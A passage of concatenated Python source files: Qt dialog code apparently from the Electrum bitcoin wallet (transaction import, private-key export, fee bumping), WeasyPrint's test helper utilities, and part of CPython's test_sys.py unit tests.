= QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnbackups.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except UserFacingException as e: self.show_error(e) return except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.pay_to_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() raw_tx = self._fetch_tx_from_network(txid) if not raw_tx: return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) def _fetch_tx_from_network(self, txid: str) -> Optional[str]: if not self.network: self.show_message(_("You are offline.")) return try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return return raw_tx @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp_dialog(self, parent_tx: Transaction) -> None: new_tx = self.wallet.cpfp(parent_tx, 0) total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return try: new_tx = self.wallet.cpfp(parent_tx, fee) except CannotCPFP as e: self.show_error(str(e)) return self.show_transaction(new_tx) def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool: """Returns whether successful.""" # note side-effect: tx is being mutated assert isinstance(tx, PartialTransaction) try: # note: this might download input utxos over network BlockingWaitingDialog( self, _("Adding info to tx, from wallet and network..."), lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False), ) except NetworkException as e: self.show_error(repr(e)) return False return True def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = BumpFeeDialog(main_window=self, tx=tx, txid=txid) d.run() def dscancel_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = DSCancelDialog(main_window=self, tx=tx, txid=txid) d.run() def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close()
testing_utils.py
""" weasyprint.tests.testing_utils ------------------------------ Helpers for tests. :copyright: Copyright 2011-2019 Simon Sapin and contributors, see AUTHORS. :license: BSD, see LICENSE for details. """ import contextlib import functools import logging import os.path import sys import threading import wsgiref.simple_server import pytest from .. import CSS, HTML, text from ..logger import LOGGER from ..urls import path2url # Lists of fonts with many variants (including condensed) if sys.platform.startswith('win'): # pragma: no cover SANS_FONTS = 'DejaVu Sans, Arial Nova, Arial, sans' MONO_FONTS = 'Courier New, Courier, monospace' elif sys.platform.startswith('darwin'): # pragma: no cover # Pango on macOS doesn't handle multiple fonts # See https://github.com/Kozea/WeasyPrint/issues/158 SANS_FONTS = 'DejaVu Sans' MONO_FONTS = 'Courier New' else: # pragma: no cover SANS_FONTS = 'DejaVu Sans, sans' MONO_FONTS = 'DejaVu Sans Mono, monospace' TEST_UA_STYLESHEET = CSS(filename=os.path.join( os.path.dirname(__file__), '..', 'css', 'tests_ua.css' )) class FakeHTML(HTML): """Like weasyprint.HTML, but with a lighter UA stylesheet.""" def _ua_stylesheets(self): return [TEST_UA_STYLESHEET] def resource_filename(basename): """Return the absolute path of the resource called ``basename``.""" return os.path.join(os.path.dirname(__file__), 'resources', basename) # Dummy filename, but in the right directory. BASE_URL = path2url(resource_filename('<test>')) class CallbackHandler(logging.Handler): """A logging handler that calls a function for every message.""" def __init__(self, callback): logging.Handler.__init__(self) self.emit = callback @contextlib.contextmanager def capture_logs(): """Return a context manager that captures all logged messages.""" logger = LOGGER messages = [] def emit(record): if record.name == 'weasyprint.progress': return message = '%s: %s' % (record.levelname.upper(), record.getMessage()) messages.append(message) previous_handlers = logger.handlers previous_level = logger.level logger.handlers = [] logger.addHandler(CallbackHandler(emit)) logger.setLevel(logging.DEBUG) try: yield messages finally: logger.handlers = previous_handlers logger.level = previous_level def assert_no_logs(function): """Decorator that asserts that nothing is logged in a function.""" @functools.wraps(function) def wrapper(*args, **kwargs): with capture_logs() as logs: try: function(*args, **kwargs) except Exception: # pragma: no cover if logs: print('%i errors logged:' % len(logs), file=sys.stderr) for message in logs: print(message, file=sys.stderr) raise else: if logs: # pragma: no cover for message in logs: print(message, file=sys.stderr) raise AssertionError('%i errors logged' % len(logs)) return wrapper @contextlib.contextmanager def http_server(handlers): def wsgi_app(environ, start_response): handler = handlers.get(environ['PATH_INFO']) if handler: status = str('200 OK') response, headers = handler(environ) headers = [(str(name), str(value)) for name, value in headers] else: # pragma: no cover status = str('404 Not Found') response = b'' headers = [] start_response(status, headers) return [response] # Port 0: let the OS pick an available port number # http://stackoverflow.com/a/1365284/1162888 server = wsgiref.simple_server.make_server('127.0.0.1', 0, wsgi_app) _host, port = server.socket.getsockname() thread = threading.Thread(target=server.serve_forever) thread.start() try: yield 'http://127.0.0.1:%s' % port finally: server.shutdown() thread.join() def requires(library_name, expected_tuple): library = getattr(text, library_name) library_version = '%06i' % getattr(library, '%s_version' % library_name)() library_tuple = tuple(int(i) for i in ( library_version[:2], library_version[2:4], library_version[4:])) return pytest.mark.skipif( library_tuple < expected_tuple, reason='Running %s %s but this test requires %s+' % ( library_name, '%i.%i.%i' % library_tuple, '%i.%i.%i' % expected_tuple))
test_sys.py
import builtins import codecs import gc import locale import operator import os import struct import subprocess import sys import sysconfig import test.support from test import support from test.support import os_helper from test.support.script_helper import assert_python_ok, assert_python_failure from test.support import threading_helper from test.support import import_helper import textwrap import unittest import warnings # count the number of test runs, used to create unique # strings to intern in test_intern() INTERN_NUMRUNS = 0 DICT_KEY_STRUCT_FORMAT = 'n2BI2n' class DisplayHookTest(unittest.TestCase): def test_original_displayhook(self): dh = sys.__displayhook__ with support.captured_stdout() as out: dh(42) self.assertEqual(out.getvalue(), "42\n") self.assertEqual(builtins._, 42) del builtins._ with support.captured_stdout() as out: dh(None) self.assertEqual(out.getvalue(), "") self.assertTrue(not hasattr(builtins, "_")) # sys.displayhook() requires arguments self.assertRaises(TypeError, dh) stdout = sys.stdout try: del sys.stdout self.assertRaises(RuntimeError, dh, 42) finally: sys.stdout = stdout def test_lost_displayhook(self): displayhook = sys.displayhook try: del sys.displayhook code = compile("42", "<string>", "single") self.assertRaises(RuntimeError, eval, code) finally: sys.displayhook = displayhook def test_custom_displayhook(self): def baddisplayhook(obj): raise ValueError with support.swap_attr(sys, 'displayhook', baddisplayhook): code = compile("42", "<string>", "single") self.assertRaises(ValueError, eval, code) class ExceptHookTest(unittest.TestCase): def test_original_excepthook(self): try: raise ValueError(42) except ValueError as exc: with support.captured_stderr() as err: sys.__excepthook__(*sys.exc_info()) self.assertTrue(err.getvalue().endswith("ValueError: 42\n")) self.assertRaises(TypeError, sys.__excepthook__) def test_excepthook_bytes_filename(self): # bpo-37467: sys.excepthook() must not crash if a filename # is a bytes string with warnings.catch_warnings(): warnings.simplefilter('ignore', BytesWarning) try: raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text")) except SyntaxError as exc: with support.captured_stderr() as err: sys.__excepthook__(*sys.exc_info()) err = err.getvalue() self.assertIn(""" File "b'bytes_filename'", line 123\n""", err) self.assertIn(""" text\n""", err) self.assertTrue(err.endswith("SyntaxError: msg\n")) def test_excepthook(self): with test.support.captured_output("stderr") as stderr: sys.excepthook(1, '1', 1) self.assertTrue("TypeError: print_exception(): Exception expected for " \ "value, str found" in stderr.getvalue()) # FIXME: testing the code for a lost or replaced excepthook in # Python/pythonrun.c::PyErr_PrintEx() is tricky. class SysModuleTest(unittest.TestCase): def tearDown(self): test.support.reap_children() def test_exit(self): # call with two arguments self.assertRaises(TypeError, sys.exit, 42, 42) # call without argument with self.assertRaises(SystemExit) as cm: sys.exit() self.assertIsNone(cm.exception.code) rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()') self.assertEqual(rc, 0) self.assertEqual(out, b'') self.assertEqual(err, b'') # call with integer argument with self.assertRaises(SystemExit) as cm: sys.exit(42) self.assertEqual(cm.exception.code, 42) # call with tuple argument with one entry # entry will be unpacked with self.assertRaises(SystemExit) as cm: sys.exit((42,)) self.assertEqual(cm.exception.code, 42) # call with string argument with self.assertRaises(SystemExit) as cm: sys.exit("exit") self.assertEqual(cm.exception.code, "exit") # call with tuple argument with two entries with self.assertRaises(SystemExit) as cm: sys.exit((17, 23)) self.assertEqual(cm.exception.code, (17, 23)) # test that the exit machinery handles SystemExits properly rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)') self.assertEqual(rc, 47) self.assertEqual(out, b'') self.assertEqual(err, b'') def check_exit_message(code, expected, **env_vars): rc, out, err = assert_python_failure('-c', code, **env_vars) self.assertEqual(rc, 1) self.assertEqual(out, b'') self.assertTrue(err.startswith(expected), "%s doesn't start with %s" % (ascii(err), ascii(expected))) # test that stderr buffer is flushed before the exit message is written # into stderr check_exit_message( r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")', b"unflushed,message") # test that the exit message is written with backslashreplace error # handler to stderr check_exit_message( r'import sys; sys.exit("surrogates:\uDCFF")', b"surrogates:\\udcff") # test that the unicode message is encoded to the stderr encoding # instead of the default encoding (utf8) check_exit_message( r'import sys; sys.exit("h\xe9")', b"h\xe9", PYTHONIOENCODING='latin-1') def test_getdefaultencoding(self): self.assertRaises(TypeError, sys.getdefaultencoding, 42) # can't check more than the type, as the user might have changed it self.assertIsInstance(sys.getdefaultencoding(), str) # testing sys.settrace() is done in test_sys_settrace.py # testing sys.setprofile() is done in test_sys_setprofile.py def test_switchinterval(self): self.assertRaises(TypeError, sys.setswitchinterval) self.assertRaises(TypeError, sys.setswitchinterval, "a") self.assertRaises(ValueError, sys.setswitchinterval, -1.0) self.assertRaises(ValueError, sys.setswitchinterval, 0.0) orig = sys.getswitchinterval() # sanity check self.assertTrue(orig < 0.5, orig) try: for n in 0.00001, 0.05, 3.0, orig: sys.setswitchinterval(n) self.assertAlmostEqual(sys.getswitchinterval(), n) finally: sys.setswitchinterval(orig) def test_recursionlimit(self): self.assertRaises(TypeError, sys.getrecursionlimit, 42) oldlimit = sys.getrecursionlimit() self.assertRaises(TypeError, sys.setrecursionlimit) self.assertRaises(ValueError, sys.setrecursionlimit, -42) sys.setrecursionlimit(10000) self.assertEqual(sys.getrecursionlimit(), 10000) sys.setrecursionlimit(oldlimit) def test_recursionlimit_recovery(self): if hasattr(sys, 'gettrace') and sys.gettrace(): self.skipTest('fatal error if run with a trace function') oldlimit = sys.getrecursionlimit() def f(): f() try: for depth in (50, 75, 100, 250, 1000): try: sys.setrecursionlimit(depth) except RecursionError: # Issue #25274: The recursion limit is too low at the # current recursion depth continue # Issue #5392: test stack overflow after hitting recursion # limit twice with self.assertRaises(RecursionError): f() with self.assertRaises(RecursionError): f() finally: sys.setrecursionlimit(oldlimit) @test.support.cpython_only def test_setrecursionlimit_recursion_depth(self): # Issue #25274: Setting a low recursion limit must be blocked if the # current recursion depth is already higher than limit. from _testinternalcapi import get_recursion_depth def set_recursion_limit_at_depth(depth, limit): recursion_depth = get_recursion_depth() if recursion_depth >= depth: with self.assertRaises(RecursionError) as cm: sys.setrecursionlimit(limit) self.assertRegex(str(cm.exception), "cannot set the recursion limit to [0-9]+ " "at the recursion depth [0-9]+: " "the limit is too low") else: set_recursion_limit_at_depth(depth, limit) oldlimit = sys.getrecursionlimit() try: sys.setrecursionlimit(1000) for limit in (10, 25, 50, 75, 100, 150, 200): set_recursion_limit_at_depth(limit, limit) finally: sys.setrecursionlimit(oldlimit) def test_getwindowsversion(self): # Raise SkipTest if sys doesn't have getwindowsversion attribute test.support.get_attribute(sys, "getwindowsversion") v = sys.getwindowsversion() self.assertEqual(len(v), 5) self.assertIsInstance(v[0], int) self.assertIsInstance(v[1], int) self.assertIsInstance(v[2], int) self.assertIsInstance(v[3], int) self.assertIsInstance(v[4], str) self.assertRaises(IndexError, operator.getitem, v, 5) self.assertIsInstance(v.major, int) self.assertIsInstance(v.minor, int) self.assertIsInstance(v.build, int) self.assertIsInstance(v.platform, int) self.assertIsInstance(v.service_pack, str) self.assertIsInstance(v.service_pack_minor, int) self.assertIsInstance(v.service_pack_major, int) self.assertIsInstance(v.suite_mask, int) self.assertIsInstance(v.product_type, int) self.assertEqual(v[0], v.major) self.assertEqual(v[1], v.minor) self.assertEqual(v[2], v.build) self.assertEqual(v[3], v.platform) self.assertEqual(v[4], v.service_pack) # This is how platform.py calls it. Make sure tuple # still has 5 elements maj, min, buildno, plat, csd = sys.getwindowsversion() def test_call_tracing(self): self.assertRaises(TypeError, sys.call_tracing, type, 2) @unittest.skipUnless(hasattr(sys, "setdlopenflags"), 'test needs sys.setdlopenflags()') def test_dlopenflags(self): self.assertTrue(hasattr(sys, "getdlopenflags")) self.assertRaises(TypeError, sys.getdlopenflags, 42) oldflags = sys.getdlopenflags() self.assertRaises(TypeError, sys.setdlopenflags) sys.setdlopenflags(oldflags+1) self.assertEqual(sys.getdlopenflags(), oldflags+1) sys.setdlopenflags(oldflags) @test.support.refcount_test def test_refcount(self): # n here must be a global in order for this test to pass while # tracing with a python function. Tracing calls PyFrame_FastToLocals # which will add a copy of any locals to the frame object, causing # the reference count to increase by 2 instead of 1. global n self.assertRaises(TypeError, sys.getrefcount) c = sys.getrefcount(None) n = None self.assertEqual(sys.getrefcount(None), c+1) del n self.assertEqual(sys.getrefcount(None), c) if hasattr(sys, "gettotalrefcount"): self.assertIsInstance(sys.gettotalrefcount(), int) def test_getframe(self): self.assertRaises(TypeError, sys._getframe, 42, 42) self.assertRaises(ValueError, sys._getframe, 2000000000) self.assertTrue( SysModuleTest.test_getframe.__code__ \ is sys._getframe().f_code ) # sys._current_frames() is a CPython-only gimmick. @threading_helper.reap_threads def test_current_frames(self): import threading import traceback # Spawn a thread that blocks at a known place. Then the main # thread does sys._current_frames(), and verifies that the frames # returned make sense. entered_g = threading.Event() leave_g = threading.Event() thread_info = [] # the thread's id def f123(): g456() def g456(): thread_info.append(threading.get_ident()) entered_g.set() leave_g.wait() t = 